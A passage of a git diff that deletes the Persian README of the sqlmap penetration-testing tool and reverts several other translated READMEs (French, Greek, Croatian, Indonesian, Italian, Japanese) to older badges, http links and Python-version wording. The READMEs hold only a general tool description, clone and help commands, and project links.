|
||||||
* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
|
* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,84 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
|
|
||||||
<div dir=rtl>
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
برنامه `sqlmap`، یک برنامهی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر میکند.
|
|
||||||
|
|
||||||
|
|
||||||
تصویر محیط ابزار
|
|
||||||
----
|
|
||||||
|
|
||||||
|
|
||||||
<div dir=ltr>
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
<div dir=rtl>
|
|
||||||
|
|
||||||
برای نمایش [مجموعه ای از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از دانشنامه دیدن کنید.
|
|
||||||
|
|
||||||
|
|
||||||
نصب
|
|
||||||
----
|
|
||||||
|
|
||||||
برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.
|
|
||||||
|
|
||||||
|
|
||||||
نحوه استفاده
|
|
||||||
----
|
|
||||||
|
|
||||||
|
|
||||||
برای دریافت لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<div dir=ltr>
|
|
||||||
|
|
||||||
|
|
||||||
```
|
|
||||||
python sqlmap.py -h
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<div dir=rtl>
|
|
||||||
|
|
||||||
|
|
||||||
برای دریافت لیست تمامی ارگومانها میتوانید از دستور زیر استفاده کنید:
|
|
||||||
|
|
||||||
<div dir=ltr>
|
|
||||||
|
|
||||||
|
|
||||||
```
|
|
||||||
python sqlmap.py -hh
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
<div dir=rtl>
|
|
||||||
|
|
||||||
|
|
||||||
برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
|
|
||||||
|
|
||||||
|
|
||||||
لینکها
|
|
||||||
----
|
|
||||||
|
|
||||||
|
|
||||||
* خانه: https://sqlmap.org
|
|
||||||
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* توییتر: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
||||||
|
|
||||||
@@ -19,7 +19,7 @@ De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sql
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/)
|
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
|
||||||
|
|
||||||
Utilisation
|
Utilisation
|
||||||
----
|
----
|
||||||
@@ -32,18 +32,18 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
|
|||||||
|
|
||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
|
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
|
||||||
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
Liens
|
Liens
|
||||||
----
|
----
|
||||||
|
|
||||||
* Page d'acceuil: https://sqlmap.org
|
* Page d'acceuil: http://sqlmap.org
|
||||||
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues
|
* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
|
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||||
|
|
||||||
@@ -20,7 +20,7 @@
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα.
|
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
|
||||||
|
|
||||||
Χρήση
|
Χρήση
|
||||||
----
|
----
|
||||||
@@ -39,12 +39,12 @@
|
|||||||
Σύνδεσμοι
|
Σύνδεσμοι
|
||||||
----
|
----
|
||||||
|
|
||||||
* Αρχική σελίδα: https://sqlmap.org
|
* Αρχική σελίδα: http://sqlmap.org
|
||||||
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||||
|
|
||||||
@@ -20,7 +20,7 @@ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sql
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.
|
sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
|
||||||
|
|
||||||
Korištenje
|
Korištenje
|
||||||
----
|
----
|
||||||
@@ -39,12 +39,12 @@ Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te op
|
|||||||
Poveznice
|
Poveznice
|
||||||
----
|
----
|
||||||
|
|
||||||
* Početna stranica: https://sqlmap.org
|
* Početna stranica: http://sqlmap.org
|
||||||
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||||
|
|
||||||
Tangkapan Layar
|
Tangkapan Layar
|
||||||
----
|
----
|
||||||
@@ -14,13 +14,14 @@ Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapprojec
|
|||||||
Instalasi
|
Instalasi
|
||||||
----
|
----
|
||||||
|
|
||||||
Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
Anda dapat mengunduh tarball versi terbaru [di sini]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun.
|
sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
|
||||||
|
|
||||||
Penggunaan
|
Penggunaan
|
||||||
----
|
----
|
||||||
@@ -39,12 +40,12 @@ Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung,
|
|||||||
Tautan
|
Tautan
|
||||||
----
|
----
|
||||||
|
|
||||||
* Situs: https://sqlmap.org
|
* Situs: http://sqlmap.org
|
||||||
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
|
* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
||||||
|
|
||||||
@@ -20,7 +20,7 @@ La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](htt
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma.
|
sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma.
|
||||||
|
|
||||||
Utilizzo
|
Utilizzo
|
||||||
----
|
----
|
||||||
@@ -39,12 +39,12 @@ Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità
|
|||||||
Link
|
Link
|
||||||
----
|
----
|
||||||
|
|
||||||
* Sito: https://sqlmap.org
|
* Sito: http://sqlmap.org
|
||||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
|
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
||||||
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
||||||
@@ -21,31 +21,31 @@ wikiに載っているいくつかの機能のデモをスクリーンショッ
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
|
sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
|
||||||
|
|
||||||
使用方法
|
使用法
|
||||||
----
|
----
|
||||||
|
|
||||||
基本的なオプションとスイッチの使用方法をリストで取得するには:
|
基本的なオプションとスイッチの使用法をリストするには:
|
||||||
|
|
||||||
python sqlmap.py -h
|
python sqlmap.py -h
|
||||||
|
|
||||||
全てのオプションとスイッチの使用方法をリストで取得するには:
|
全てのオプションとスイッチの使用法をリストするには:
|
||||||
|
|
||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
|
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
|
||||||
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
|
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
|
||||||
|
|
||||||
リンク
|
リンク
|
||||||
----
|
----
|
||||||
|
|
||||||
* ホームページ: https://sqlmap.org
|
* ホームページ: http://sqlmap.org
|
||||||
* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
